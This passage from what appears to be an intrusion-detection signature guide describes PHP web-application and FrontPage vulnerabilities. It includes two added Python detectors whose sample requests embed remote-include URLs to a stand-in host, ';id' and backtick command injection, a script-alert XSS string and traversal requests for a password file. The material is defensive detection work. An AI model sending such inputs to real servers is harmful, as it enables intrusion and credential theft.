URL request to the defines.php script that specifies the db_mysql.php or english.php script on a remote system as a
parameter, which would allow the attacker to execute code on the vulnerable web server. Upgrade to the latest version
of WebChat, available at the vendor's website.
Signature ID: 1891
WEB-PHP WebChat english.php file include Vulnerability
Threat Level: Information
Industry ID: CVE-2007-0485 Bugtraq: 7000,22153
Signature Description: WebChat is an open-source PHP-based chat program developed by Webdev. WebChat version
0.77 could allow a remote attacker to include malicious PHP files. A remote attacker could send a specially crafted
URL request to the defines.php script that specifies the db_mysql.php or english.php script on a remote system as a
parameter, which would allow the attacker to execute code on the vulnerable web server. Upgrade to the latest version
of WebChat, available at the vendor's website.
Signature ID: 1892
WEB-PHP YaBB SE packages.php file include Vulnerability
Threat Level: Information
Bugtraq: 6663
Signature Description: YaBB (Yet Another Bulletin Board) is an open-source bulletin board system that runs on any
system capable of executing Perl CGI scripts; YaBB SE is its PHP port. YaBB SE versions prior to 1.5.0 could allow a
remote attacker to include malicious PHP files. A remote attacker could use the $sourcedir variable of the Packages.php
script to specify the Packer.php script on a remote system, which would allow the attacker to execute code on the
vulnerable web server. No remedy was available as of 2008.
Signature ID: 1894
WEB-PHP Nuke Remote File Copy Vulnerability
Threat Level: Information
Industry ID: CVE-2001-1032 Bugtraq: 3361
Signature Description: PHP-Nuke is a web-based automated news publishing and content management system based
on PHP and MySQL. The system is fully controlled through a web-based user interface. PHP-Nuke versions 5.0, 5.0.1,
5.1, and 5.2 could allow a remote attacker to overwrite files on the web server, caused by a vulnerability in the
admin.php script. When admin.php is requested with the 'upload' variable set, the script fails to check whether the
user is an administrator. A remote attacker could exploit this vulnerability to copy, upload, and overwrite arbitrary
files on the web server. No remedy was available as of August 2008.
Signature ID: 1896
VBulletin Calendar.PHP Command Execution Vulnerability
Threat Level: Severe
Industry ID: CVE-2002-1660 CVE-2004-1785 CVE-2002-2157 Bugtraq: 5820,9353 Nessus: 11179
Signature Description: vBulletin is a program used to create Internet forums or message boards. vBulletin is written in
PHP and uses a MySQL database server. vBulletin versions 2.2.0 and prior could allow a remote attacker to execute
commands on the server. A remote attacker could pass shell metacharacters (such as ; : | / \) in an HTTP request to
the calendar.php script, causing arbitrary commands to be executed on the system with the privileges of the web
server user.
Signature ID: 1897
WEB-PHP E107 chatbox.php DOS Vulnerability
Threat Level: Information
Industry ID: CVE-2003-1191 Bugtraq: 8930
Signature Description: e107 is an open source content management system (CMS) that allows for the quick creation
and management of websites or community portals. e107 versions 0.545 and 0.603 are vulnerable to a denial of service.
The issue is reported to exist due to improper handling of user-supplied data, in the form of HTML or script code,
submitted to the 'Name:' field of the chatbox.php script. This may cause the software to behave in an unstable manner,
leading to a crash. Successful exploitation of this issue may allow an attacker to cause the software to crash or hang.
Upgrade to the latest version of e107, available at the vendor's website.
Signature ID: 1899
WEB-PHP content-disposition memchr overflow Vulnerability
Threat Level: Information
Industry ID: CVE-2002-0081 Bugtraq: 4183 Nessus: 10867
Signature Description: PHP is a scripting language widely used in web development. It can be installed on a variety of
web servers, including Apache, IIS, Caudium, Netscape and iPlanet. PHP versions 4.1.0, 4.1.1, 4.0.6 and 3.0.x are
vulnerable to a buffer overflow in the handling of file uploads. Specifically, the problem occurs in the functions used
to decode MIME-encoded file uploads. As a result, it may be possible to overrun the buffer used by the vulnerable
functions and cause arbitrary attacker-supplied instructions to be executed. A successful attacker can execute code in
the security context of the user running the web server on the affected system.
Signature ID: 1900
WEB-PHP Marcus Xenakis directory.php arbitrary command attempt_1 Vulnerability
Threat Level: Information
Industry ID: CVE-2002-0434 Bugtraq: 4278 Nessus: 11017
Signature Description: The directory.php script by Marcus Xenakis provides a web interface for directory listings and
is vulnerable to shell command execution. A remote attacker could send a specially crafted HTTP request to
directory.php with shell metacharacters (such as ; or |) in the 'dir' parameter, which could allow the attacker to
execute arbitrary shell commands on the system. No remedy was available as of August 2008.
Signature ID: 1901
WEB-PHP Vibechild Directory Manager edit_image.php access Vulnerability
Threat Level: Severe
Industry ID: CVE-2001-1020 Bugtraq: 3288 Nessus: 11104
Signature Description: Directory Manager 0.9 is an application used to maintain LDAP directory data. It is maintained
by Vibechild and hosted for download on Sourceforge.net. An input validation error exists in Directory Manager that
may enable remote attackers to execute arbitrary code on a host running the software. The flaw is due to a script in the
package that fails to filter shell metacharacters from a user-supplied value passed to PHP's passthru() function.
Exploitation of this vulnerability may lead to the disclosure of sensitive data on, or compromise of, a vulnerable host.
Signature ID: 1902
WEB-PHP Bytehoard files.inc.php access Vulnerability
Threat Level: Warning
Industry ID: CVE-2003-1153 Bugtraq: 8910
Signature Description: Bytehoard is a file storage/transfer application implemented in PHP. A remote attacker could
send a specially crafted HTTP request to the files.inc.php script to view the root directory of the victim's system. The
attacker can gain unauthorized access to the web root and traverse directories inside and outside of it, potentially
resulting in information disclosure. The vulnerable versions are Bytehoard 0.7.0 and Bytehoard 0.71.0.
Signature ID: 1903
WEB-PHP Pod.Board forum_details.php access Vulnerability
Threat Level: Warning
Bugtraq: 7933 Nessus: 11760
Signature Description: Pod.board is a web-based portal/forum system implemented in PHP. It is available for a range of
systems, including Unix, Linux, and Microsoft Windows. The pod.board 'forum_details.php' script does not sufficiently
sanitize data supplied via the URI parameters 'user_homepage', 'user_location', 'user_nick' and 'user_signature'; the
corresponding input fields are not stripped of HTML tags. This could allow execution of hostile HTML and script code
in the web client of a user who visits a web page that contains the injected code. The vulnerable version is
planetinsanity.de pod.board 1.1.0.
Signature ID: 1904
WEB-PHP VBPortal friends.php access Vulnerability
Threat Level: Warning
Bugtraq: 9088
Signature Description: vbPortal is a portal application which can be used in conjunction with vBulletin forums. A
vulnerability in the friends.php script included with vbPortal may allow a remote attacker to relay unauthorized e-mail.
The issue occurs in the handling of the yname and ymail variables: because these variables are placed in the mail
headers unchecked, an attacker can set them to arbitrary values. This could permit an attacker to send e-mail through
the server to any destination while hiding behind the address of the vbPortal server. The vulnerable version is vbPortal
2.0.0 alpha 8.1.
Signature ID: 1905
WEB-PHP gallery remote file include Vulnerability
Threat Level: Warning
Industry ID: CVE-2003-1227 Bugtraq: 8814 Nessus: 11876
Signature Description: Gallery is prone to a remote file include vulnerability in the index.php script. When running on
Windows, or in configuration mode on Unix, it allows remote attackers to inject arbitrary PHP code via a URL in the
GALLERY_BASEDIR parameter, executed with the privileges of the web server. The vulnerable versions are Gallery 1.4
and Gallery 1.4-pl1.
Signature ID: 1906
WEB-PHP myPHPNuke chatheader.php Cross site scripting Vulnerability
Threat Level: Warning
Bugtraq: 6544
Signature Description: myPHPNuke is a web portal system based on PHP-Nuke 4.4.1a. It is available for the Linux
and Microsoft Windows operating systems. The vulnerability exists in the chatheader.php and partner.php scripts
included with myPHPNuke. Specifically, malicious HTML code is not properly sanitized from the value of the
'Default_Theme' URI parameter. This vulnerability was reported for myPHPNuke 1.8.8_final_7 and earlier versions.
This signature detects cross-site scripting attempts against the chatheader.php script.
Signature ID: 1907
WEB-PHP myPHPNuke partner.php Cross site scripting Vulnerability
Threat Level: Warning
Bugtraq: 6544
Signature Description: myPHPNuke is a web portal system based on PHP-Nuke 4.4.1a. It is available for the Linux
and Microsoft Windows operating systems. The vulnerability exists in the chatheader.php and partner.php scripts
included with myPHPNuke. Specifically, malicious HTML code is not properly sanitized from the value of the
'Default_Theme' URI parameter. This vulnerability was reported for myPHPNuke 1.8.8_final_7 and earlier versions.
This signature detects cross-site scripting attempts against the partner.php script.
Signature ID: 1908
WEB-PHP myphpPagetool pt_config.inc file include Vulnerability
Threat Level: Warning
Bugtraq: 6744
Signature Description: myphpPagetool is an application used to maintain a web site using a MySQL database, which
stores and manages all web pages and their contents. myphpPagetool is written in PHP and is available for a variety of
platforms. myphpPagetool 0.4.3-1 is vulnerable: it may allow remote attackers to supply the path of a 'pt_config.inc'
file located on a remote server. The issue is present in the index.php, help1.php, help2.php, help3.php, help4.php,
help5.php, help6.php, help7.php, help8.php and help9.php pages in the /doc/admin folder.
Signature ID: 1909
WEB-PHP YaBB SE news.php file include Vulnerability
Threat Level: Warning
Bugtraq: 6674
Signature Description: YaBB SE is a freely available, open source port of Yet Another Bulletin Board (YaBB). It is
available for platforms including Unix, Linux, and Microsoft Windows operating systems. Due to insufficient
sanitization of some user-supplied variables by the 'News.php' script, a remote attacker can include a malicious PHP
file via a URL. An attacker may exploit this by supplying the path of a maliciously created file, located on an
attacker-controlled host, as the value of the '$template' parameter. The vulnerable versions are YaBB SE 1.5.1 and
earlier.
Signature ID: 1910
WEB-PHP newsPHP Language file include Vulnerability
Threat Level: Warning
Bugtraq: 8488
Signature Description: A file include vulnerability has been reported in the nphpd.php module of newsPHP 216 that
may permit an attacker to include and execute malicious script code on a vulnerable host. The issue is reported to exist
in the LangFile variable of the nphpd.php module. Successful exploitation may lead to execution of arbitrary code on a
vulnerable system by a remote attacker.
Signature ID: 1911
WEB-PHP phpMyAdmin db_details_importdocsql.php access Vulnerability
Threat Level: Warning
Bugtraq: 7965,7963 Nessus: 11761
Signature Description: phpMyAdmin is a freely available tool that provides a web interface for handling MySQL
administrative tasks. A flaw exists in phpMyAdmin whereby passwords are stored in plain text in the cookie data;
even a local user with access to that cookie information could use it to access the site hosting phpMyAdmin as the
victim user. phpMyAdmin 2.5.1 and earlier are vulnerable. This issue may be exacerbated by the fact that the
credentials may be reused across multiple systems.
Signature ID: 1912
WEB-PHP phpbb quick-reply.php access Vulnerability
Threat Level: Warning
Industry ID: CVE-2002-2287 Bugtraq: 6173
Signature Description: This event is generated when an attempt is made to gain unauthorized access to a PHP
application running on a web server. Some applications do not perform stringent checks when validating the credentials
of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly
escalation of privileges to those of the administrator. Data stored on the machine can be compromised, and trust
relationships between the victim server and other hosts can be exploited by the attacker. phpBB Advanced Quick Reply
Hack 1.1.0 and phpBB Advanced Quick Reply Hack 1.0.0 are vulnerable.
Signature ID: 1913
WEB-PHP phpbb quick-reply.php arbitrary command Vulnerability
Threat Level: Warning
Industry ID: CVE-2002-2287 Bugtraq: 6173
Signature Description: phpBB Advanced Quick Reply Hack is a freely available phpBB modification. It adds the
ability for users to post quick replies to messages. The phpBB Advanced Quick Reply Hack is prone to an issue which
may allow attackers to include arbitrary files from a remote server. It is possible for remote attackers to influence the
include path for 'extension.inc' in the 'quick_reply.php' script. As a result, an attacker may cause an arbitrary PHP
script to be included from an attacker-supplied source, which may result in execution of commands with the privileges
of the web server. phpBB Advanced Quick Reply Hack 1.1.0 and phpBB Advanced Quick Reply Hack 1.0.0 are
vulnerable.
Signature ID: 1914
WEB-PHP BadBlue phptest.php access Vulnerability
Threat Level: Warning
Industry ID: CVE-2004-2374 Bugtraq: 9737
Signature Description: BadBlue is a P2P file sharing application distributed by Working Resources; its Office file
sharing works over the web. BadBlue server is prone to a remote path disclosure vulnerability: a request for the
'phptest.php' script returns HTML whose source contains the local installation path of the server on the machine.
BadBlue version 2.4 has been reported to be affected by this issue; other versions may be vulnerable as well.
Signature ID: 1915
WEB-PHP piranha passwd.php3 access Vulnerability
Threat Level: Warning
Industry ID: CVE-2000-0322 Bugtraq: 1149
Signature Description: A vulnerability exists in the passwd.php3 cgi-bin script included by Red Hat as part of the
Piranha virtual server package in Red Hat Linux 6.2. Due to improper checking of input in the
"http://localhost/piranha/secure/passwd.php3" script, it is possible to execute commands by entering 'blah;somecommand'
into the password fields. Everything after the semicolon is executed with the same privileges as the web server. This
may be used to gain access to the machine, resulting in further compromise.
Signature ID: 1916
WEB-PHP pmachine remote file include Vulnerability
Threat Level: Warning
Industry ID: CVE-2003-1086 Bugtraq: 7919 Nessus: 11739
Signature Description: pMachine is a freely available PHP-based publishing program that uses a MySQL backend
database. pMachineFree version 2.2.1 could allow a remote attacker to include malicious PHP files, caused by
improper filtering of user-supplied input. A remote attacker could send a specially crafted URL request to the
lib.inc.php script using the pm_path variable to specify a malicious PHP file on a remote system as a parameter,
which could then be used by the attacker to execute arbitrary code on the vulnerable system.
Signature ID: 1918
WEB-PHP remote include path Vulnerability
Threat Level: Information
Signature Description: PHP is a scripting language designed for creating dynamic web pages. When a visitor opens a
page, the server processes the PHP commands and then sends the result to the visitor's browser. This rule triggers on
requests for '.php' files that carry a 'path' parameter. Successful exploitation of an include path vulnerability of this
kind allows an attacker to execute arbitrary PHP code.
Signature ID: 1919
WEB-PHP rolis guestbook access Vulnerability
Threat Level: Warning
Bugtraq: 9057
Signature Description: MediaWiki is vulnerable to a remote file include via the 'IP' parameter. The problem occurs
due to insufficient input validation of user-supplied URI parameters. As a result, an attacker may be able to cause a
malicious PHP file to be included and interpreted by the target system. Depending on the payload, this could allow an
attacker to gain unauthorized remote access to a vulnerable system. Vulnerable platforms are MediaWiki-stable
20031107 and MediaWiki-stable 20030829.
Signature ID: 1920
WEB-PHP rolis guestbook remote file include Vulnerability
Threat Level: Warning
Bugtraq: 9057
Signature Description: MediaWiki is vulnerable to a remote file include via the 'IP' parameter. The problem occurs
due to insufficient input validation of user-supplied URI parameters. As a result, an attacker may be able to cause a
malicious PHP file to be included and interpreted by the target system. Depending on the payload, this could allow an
attacker to gain unauthorized remote access to a vulnerable system. Vulnerable platforms are MediaWiki-stable
20031107 and MediaWiki-stable 20030829.
Signature ID: 1921
WEB-PHP smssend.php access Vulnerability
Threat Level: Warning
Industry ID: CVE-2002-0220 Bugtraq: 3982
Signature Description: PhpSmsSend is a front end to the SmsSend program and allows users to send SMS messages
through a web interface. SmsSend is available for Linux and Microsoft Windows. PhpSmsSend 1.0 does not properly
validate user-supplied input that is passed to a shell command. A malicious party may include shell metacharacters
such as '`' in the input and execute additional, arbitrary shell commands. This may lead to local access to the
vulnerable system.
Signature ID: 1922
WEB-PHP squirrel mail spell-check arbitrary command Vulnerability
Threat Level: Warning
Bugtraq: 3952
Signature Description: SquirrelMail is a feature-rich webmail program implemented in the PHP4 language. It is
available for Linux and Unix-based operating systems. The vulnerability exists in SquirrelSpell, a spellchecker plugin
included with SquirrelMail. A remote user can call this script with additional shell commands embedded in its
variables. The shell commands are then executed as the web server user, which may allow the attacker to gain local
access to the machine as the non-privileged user 'nobody'.
Signature ID: 1923
WEB-PHP squirrel mail theme arbitrary command Vulnerability
Threat Level: Severe
Industry ID: CVE-2002-0516 Bugtraq: 4385
Signature Description: SquirrelMail is a feature-rich webmail program implemented in the PHP4 language. It is
available for Linux and Unix-based operating systems. SquirrelMail allows for extended functionality through a plugin
system. A vulnerability has been reported in some versions of SquirrelMail: through maliciously constructed cookie
data, it is possible to corrupt the variable used to select a user's theme and force the vulnerable script to execute
arbitrary commands.
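The file include, command execution and cross-site scripting signatures above (1881 through 1923) all key on the value of one request parameter or cookie: a URL in an include-path variable such as $PGV_BASE_DIRECTORY, $IP, 'ONLY', 'waroot', GALLERY_BASEDIR, '$template', LangFile, pm_path or 'path'; shell metacharacters in 'dir', the calendar.php or passwd.php3 fields, or the SquirrelMail theme cookie; script tags in 'firstname', 'id' or 'Default_Theme'. The Python below is an added example and is not code from this guide, from the TMS zl module or from any of the products named. It runs those three checks over constructed request lines: the parameter names come from the descriptions above, while the request lines, the 203.0.113.5 address, the 'theme' cookie name, the list of remote schemes and the regular expressions are this example's own assumptions.

```python
"""Parameter-value checks behind the PHP web-application signatures above.

Added example; not code from the HP guide or from any of the products named.
The request lines are constructed, the parameter names come from the
signature descriptions above, and the regular expressions are this example's
own approximation of what an IDS rule would match.
"""
import re
from urllib.parse import unquote

# Include-path parameters named by the remote file include signatures above
# (signature IDs in the comments). Any other parameter carrying a URL is
# reported too, under the generic name "other".
INCLUDE_PARAMS = {
    "PGV_BASE_DIRECTORY",  # 1881  PhpGedView functions.php
    "IP",                  # 1883, 1885, 1887, 1919, 1920  MediaWiki $IP
    "ONLY",                # 1886  TYPO3 translations.php
    "waroot",              # 1888, 1889  WAnewsletter
    "sourcedir",           # 1892  YaBB SE Packages.php
    "GALLERY_BASEDIR",     # 1905  Gallery index.php
    "template",            # 1909  YaBB SE News.php
    "LangFile",            # 1910  newsPHP nphpd.php
    "pm_path",             # 1916  pMachine lib.inc.php
    "path",                # 1918  generic remote include path
}

# Schemes an include() would fetch remotely (assumed list, not from the guide).
REMOTE_SCHEME = re.compile(r"^\s*(?:https?|ftp)://", re.IGNORECASE)
# Characters that end or chain a shell command built from user input:
# ';' and '|' (1896, 1900, 1915), the backtick (1921), plus "$(" and newline.
SHELL_META = re.compile(r"[;|`\n]|\$\(")
# Script injection as in the search.php, note_overview.php, forum_details.php
# and chatheader.php cross-site scripting signatures (1882, 1884, 1903, 1906).
XSS = re.compile(r"<\s*script|javascript:|\bon[a-z]+\s*=", re.IGNORECASE)


def decode(value: str, rounds: int = 3) -> str:
    """Percent-decode until stable (bounded), so %253B is still seen as ';'."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def parameters(request_line: str, cookie: str = "") -> list:
    """(name, raw value) pairs from the query string and an optional Cookie header.

    The query is split on '&' only, so a ';' inside a value reaches the shell check.
    """
    parts = request_line.split(" ")
    target = parts[1] if len(parts) > 1 else parts[0]
    query = target.partition("?")[2]
    pairs = []
    for field in query.split("&"):
        if field:
            name, _, value = field.partition("=")
            pairs.append((unquote(name), value))
    for part in cookie.split(";"):
        name, _, value = part.strip().partition("=")
        if name:
            pairs.append((name, value))
    return pairs


def classify(request_line: str, cookie: str = "") -> list:
    """Return the signature classes a request would trigger, sorted."""
    hits = set()
    for name, raw in parameters(request_line, cookie):
        value = decode(raw)
        if REMOTE_SCHEME.search(value):
            label = name if name in INCLUDE_PARAMS else "other"
            hits.add(f"rfi({label})")
        if SHELL_META.search(value):
            hits.add(f"shell({name})")
        if XSS.search(value):
            hits.add(f"xss({name})")
    return sorted(hits)


# Constructed requests against the scripts named above (203.0.113.5 is a
# documentation address; "theme" is an assumed cookie name).
SAMPLES = [
    ("GET /pgv/functions.php?PGV_BASE_DIRECTORY=http://203.0.113.5/inc.txt? HTTP/1.0", ""),
    ("GET /typo3/translations.php?ONLY=http%253A%252F%252F203.0.113.5%252Fx HTTP/1.1", ""),
    ("GET /gallery/index.php?GALLERY_BASEDIR=../gallery/ HTTP/1.1", ""),
    ("GET /directory.php?dir=.%3Bid HTTP/1.0", ""),
    ("GET /search.php?firstname=%3Cscript%3Ealert(1)%3C%2Fscript%3E HTTP/1.0", ""),
    ("GET /src/webmail.php HTTP/1.0", "theme=default%60id%60"),
]

if __name__ == "__main__":
    for line, cookie in SAMPLES:
        print(f"{classify(line, cookie) or ['-']}  {line}")
```

Decoding until the value is stable is what lets the check report the double-encoded TYPO3 request as rfi(ONLY); a sensor that decodes once sees only "http%3A%2F%2F..." and misses it. The check is deliberately stricter than signature 1918 as described, which fires on any 'path' parameter: here a value only counts as a remote include when it carries a URL scheme, so the local "../gallery/" value is not reported, and whether that trade-off is acceptable depends on how much benign traffic carries those parameter names on a given network.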
Signature ID: 1924
WEB-PHP W4 Server Cgitest.exe Buffer Overflow Vulnerability
Threat Level: Warning
Bugtraq: 802
Signature Description: W4-Server 2.6a, a 32-bit personal web server by Antelope Software, has a flaw in the
Cgitest.exe sample CGI executable. This compiled CGI script fails to perform bounds checking on user-supplied data
and is vulnerable to a buffer overflow. Remote attackers can send carefully constructed values to overflow the buffer
and execute arbitrary code.
Signature ID: 1926
WEB-FRONTPAGE access.cnf access Vulnerability
Threat Level: Warning
Industry ID: CVE-2002-1717 Bugtraq: 4078 Nessus: 10575
Signature Description: Microsoft Internet Information Server (IIS) version 5.1 could reveal file contents. If a remote
attacker sends a specially-crafted GET request containing "dot dot" sequences (/../) to the server for one of the .cnf files
in the /_vti_pvt/ directory, the attacker could cause the server to return the contents of the requested file.
Signature ID: 1927
WEB-FRONTPAGE administrators.pwd access Vulnerability
Threat Level: Warning
Bugtraq: 1205
Signature Description: Microsoft FrontPage Extensions creates an administrators.pwd file inside the _vti_pvt directory
in the HTTP server's document root. This file contains encrypted passwords which could be remotely retrieved by an
attacker and cracked offline. If the passwords in this file are weak enough, or enough time is spent cracking them, the
attacker could potentially obtain the plaintext password and use it to access resources on the server.
Signature ID: 1928
WEB-FRONTPAGE author.exe access Vulnerability
Threat Level: Warning
Bugtraq: 2144
Signature Description: Microsoft IIS ships with FrontPage Server Extensions (FPSE), which enable administrators to
manage web pages and content locally and remotely. This event is generated when an attempt is made to use a
FrontPage client to connect to, and/or publish content to, a web server with FrontPage Server Extensions enabled.
Vulnerable platforms are Microsoft IIS 4.0 and 5.0.
Signature ID: 1929
WEB-FRONTPAGE cfgwiz.exe access vulnerability
Threat Level: Warning
Signature Description: Microsoft FrontPage Server Extensions 2002 and prior versions have serious security
vulnerabilities which could enable an attacker to run arbitrary code on a user's system. This signature detects access
to the FrontPage /cfgwiz.exe file. An attacker who successfully exploited the vulnerability could run code with Local
System privileges on an affected system, or could cause FrontPage Server Extensions to fail.
Signature ID: 1930
WEB-FRONTPAGE contents.htm access Vulnerability
Threat Level: Warning
Signature Description: Microsoft FrontPage Server Extensions 2002 and prior versions have serious security
vulnerabilities which could enable an attacker to run arbitrary code on a user's system. An attacker who successfully
exploited this vulnerability could run code with Local System privileges on an affected system, or could cause
FrontPage Server Extensions to fail. This signature detects access to the vulnerable contents.htm file.
Signature ID: 1931
WEB-FRONTPAGE form_results access Vulnerability
Threat Level: Warning
Industry ID: CVE-1999-1052
Signature Description: Microsoft FrontPage stores form results in a default location in /_private/form_results.txt,
which is world-readable and accessible in the document root, which allows remote attackers to read possibly sensitive
information submitted by other users. The attacker is required to have prior knowledge of file names to exploit this
vulnerability, which does not yield any other privileges than read access.
Signature ID: 1932
WEB-FRONTPAGE form_results.htm access Vulnerability
Threat Level: Warning
Industry ID: CVE-1999-1052
Signature Description: A vulnerability in the file access protocols of the Microsoft Personal Web Server (PWS) and
FrontPage PWS could allow arbitrary files to be remotely read. Microsoft FrontPage Server Extensions 2002 and prior
versions also have serious security vulnerabilities which could enable an attacker to run arbitrary code on a user's
system; an attacker who successfully exploited those could run code with Local System privileges on an affected
system, or could cause FrontPage Server Extensions to fail. For the file read issue, the attacker is required to have
prior knowledge of file names, and it yields no privileges other than read access.
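The FrontPage access signatures (1926 through 1932), like the Bytehoard (1902) and BadBlue phptest.php (1914) entries, match on the requested path rather than on a parameter value, and the access.cnf description notes that the request carries "dot dot" sequences. The Python below is an added example, not code from this guide, from the TMS zl module or from Microsoft: it canonicalises the request target (percent-decoding in bounded rounds, folding backslashes, collapsing '.' and '..') before matching, so an encoded or traversal-wrapped request for the same file still hits, and it flags a path that climbs above the document root. The file names come from the descriptions above; the request targets are constructed, and the /_vti_bin/_vti_aut/ directory in the author.exe sample is assumed rather than taken from the guide.

```python
"""Path-based checks behind the WEB-FRONTPAGE access signatures above.

Added example; not code from the HP guide or from Microsoft. The file names
come from the signature descriptions, the request targets are constructed,
and the rules are this example's own approximation of an IDS path match.
"""
import re
from urllib.parse import unquote

# (pattern on the canonical path, label). Case-insensitive because IIS is.
RULES = [
    (re.compile(r"/_vti_pvt/[^/]+\.cnf$", re.I), "1926 _vti_pvt .cnf"),
    (re.compile(r"/_vti_pvt/administrators\.pwd$", re.I), "1927 administrators.pwd"),
    (re.compile(r"/author\.exe$", re.I), "1928 author.exe"),
    (re.compile(r"/_private/form_results\.(?:txt|htm)$", re.I), "1931/1932 form_results"),
    (re.compile(r"/phptest\.php$", re.I), "1914 phptest.php"),
]


def canonical(target: str) -> tuple:
    """Canonicalise a request target the way the server's file system would.

    Returns (path, escaped): the query string is dropped, percent-encoding is
    removed in bounded rounds, backslashes become '/', and '.' and '..'
    segments are collapsed. `escaped` is True when '..' climbed above the
    document root, which is the traversal the Bytehoard entry (1902) describes.
    """
    path = target.partition("?")[0]
    for _ in range(3):
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    path = path.replace("\\", "/")
    parts, escaped = [], False
    for segment in path.split("/"):
        if segment in ("", "."):
            continue
        if segment == "..":
            if parts:
                parts.pop()
            else:
                escaped = True
            continue
        parts.append(segment)
    return "/" + "/".join(parts), escaped


def match(target: str) -> list:
    """Labels of the rules a request target triggers, plus a traversal flag."""
    path, escaped = canonical(target)
    hits = [label for rule, label in RULES if rule.search(path)]
    if escaped:
        hits.append("traversal above document root")
    return hits


# Constructed request targets; the _vti_bin/_vti_aut directory is assumed.
SAMPLES = [
    "/_vti_pvt/access.cnf",
    "/site/../_vti_pvt/%61ccess.cnf?x=1",
    "/docs/%2e%2e/%2e%2e/_vti_pvt/administrators.pwd",
    "/_vti_bin/_vti_aut/author.exe",
    "/_private/form_results.txt",
    "/images/logo.png",
]

if __name__ == "__main__":
    for target in SAMPLES:
        print(f"{canonical(target)[0]:45} {match(target) or '-'}")
```

Matching the raw request string would miss "/site/../_vti_pvt/%61ccess.cnf", which the server resolves to the same access.cnf file; matching after canonicalisation catches both, and the separate traversal flag distinguishes a request that merely uses '..' inside the web root from one that tries to leave it.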
Signature ID: 1933
WEB-FRONTPAGE fpadmcgi.exe access Vulnerability
Threat Level: Warning
Signature Description: On the web server computer, Fpadmdll.dll or Fpadmcgi.exe acts as the form handler for the
SharePoint Team Services and FrontPage 2002 Server Extensions HTML Administration pages. Microsoft FrontPage
Server Extensions 2002 and prior versions have serious security vulnerabilities which could enable an attacker to run
arbitrary code on a user's system. An attacker who successfully exploited this vulnerability could run code with Local
System privileges on an affected system, or could cause FrontPage Server Extensions to fail.
Signature ID: 1934
WEB-FRONTPAGE fpadmin.htm access Vulnerability
Threat Level: Warning
Signature Description: The HTML Administration Forms are used to install and administer Microsoft FrontPage Server
Extensions remotely with a web browser. When you install FrontPage Server Extensions during Microsoft Office
Server Extensions (OSE) Setup, the forms are copied to your web server, and the home page of the HTML
Administration Forms is Fpadmin.htm. Microsoft FrontPage Server Extensions 2002 and prior versions have serious
security vulnerabilities which could enable an attacker to run arbitrary code on a user's system. An attacker who
successfully exploited this vulnerability could run code with Local System privileges on an affected system, or could
cause FrontPage Server Extensions to fail.
Signature ID: 1935
WEB-FRONTPAGE fpremadm.exe access Vulnerability
Threat Level: Warning
Signature Description: Fpremadm uses Fpadmdll.dll, the same server-side ISAPI program used by the HTML
Administration Forms. Fpremadm is the utility that lets you administer FrontPage Server Extensions remotely. Its
interface is based on the administration utility Fpsrvadm.exe and performs all of the same commands. Fpremadm
requires Microsoft Internet Explorer on the client computer. Microsoft FrontPage Server Extensions 2002 and prior
versions have serious security vulnerabilities which could enable an attacker to run arbitrary code on a user's system.
An attacker who successfully exploited this vulnerability could run code with Local System privileges on an affected
system, or could cause FrontPage Server Extensions to fail.
Signature ID: 1936
WEB-FRONTPAGE fpsrvadm.exe access Vulnerability
Threat Level: Warning
Signature Description: Fpremadm is the utility that actually lets you administer FrontPage Server Extensions remotely.
The Fpremadm utility interface is based on the administration utility Fpsrvadm.exe and performs all of the same
commands. Fpremadm requires Microsoft Internet Explorer to be installed on the client computer. Microsoft FrontPage
Server Extensions 2002 and prior versions have serious security vulnerabilities which could enable an attacker to run
arbitrary code on a user's system. An attacker who successfully exploited this vulnerability could run code
with Local System privileges on an affected system, or could cause FrontPage Server Extensions to fail.
Signature ID: 1937
WEB-FRONTPAGE frontpage rad fp4areg.dll access Vulnerability
Threat Level: Severe
Industry ID: CVE-2001-0341 Bugtraq: 2906 Nessus: 10699
Signature Description: Microsoft FrontPage Server Extensions (FPSE), included with the IIS Web server, contain a flaw
that may allow a remote attacker to execute arbitrary code. The issue is due to a sub-component of FPSE called Visual
Studio Remote Application Deployment (RAD), which allows Visual InterDev users to register and unregister
programming components on the IIS server. The sub-component contains an unchecked buffer that may allow an
attacker to execute arbitrary code with IUSR_Machine privileges. Vulnerable platforms are Microsoft FrontPage Server
Extensions 2000, Microsoft IIS 4.0, Microsoft IIS 5.0 and Microsoft Windows 2000 Advanced Server.
Signature ID: 1938
WEB-FRONTPAGE orders.htm access Vulnerability
Threat Level: Warning
Signature Description: Microsoft FrontPage Server Extensions 2002 and prior versions have serious security
vulnerabilities which could enable an attacker to run arbitrary code on a user's system. An attacker who successfully
exploited this vulnerability could run code with Local System privileges on an affected system, or could
cause FrontPage Server Extensions to fail. This signature detects access to the vulnerable orders.htm file.
Signature ID: 1939
WEB-FRONTPAGE orders.txt access Vulnerability
Threat Level: Warning
Signature Description: Microsoft FrontPage Server Extensions 2002 and prior versions have serious security
vulnerabilities which could enable an attacker to run arbitrary code on a user's system. An attacker who successfully
exploited this vulnerability could run code with Local System privileges on an affected system, or could
cause FrontPage Server Extensions to fail.
Signature ID: 1940
WEB-FRONTPAGE register.htm access Vulnerability
Threat Level: Warning
Signature Description: Microsoft FrontPage Extensions on IIS or Apache web servers are prone to an information
disclosure vulnerability. The web server may allow remote users to read sensitive information from .htm files.
Submitting a request for one of the vulnerable files by way of '/_private/register.htm' will cause the host to reveal
sensitive information.
Signature ID: 1941
WEB-FRONTPAGE register.txt access Vulnerability
Threat Level: Warning
Signature Description: Microsoft FrontPage Extensions on IIS or Apache web servers are prone to an information
disclosure vulnerability. The web server may allow remote users to read sensitive information from .txt files.
Submitting a request for one of the vulnerable files by way of '/_private/' will cause the host to reveal sensitive
information.
Signature ID: 1942
WEB-FRONTPAGE registrations.htm access Vulnerability
Threat Level: Warning
Signature Description: Microsoft FrontPage Extensions on IIS or Apache web servers are prone to an information
disclosure vulnerability. The web server may allow remote users to read sensitive information from .htm files.
Submitting a request for one of the vulnerable files by way of '/_private/registrations.htm' will cause the host to reveal
sensitive information.
Signature ID: 1943
WEB-FRONTPAGE registrations.txt access Vulnerability
Threat Level: Warning
Signature Description: Microsoft FrontPage Extensions on IIS or Apache web servers are prone to an information
disclosure vulnerability. The web server may allow remote users to read sensitive information from .txt files.
Submitting a request for one of the vulnerable files by way of '/_private/' will cause the host to reveal sensitive
information.
Signature ID: 1944
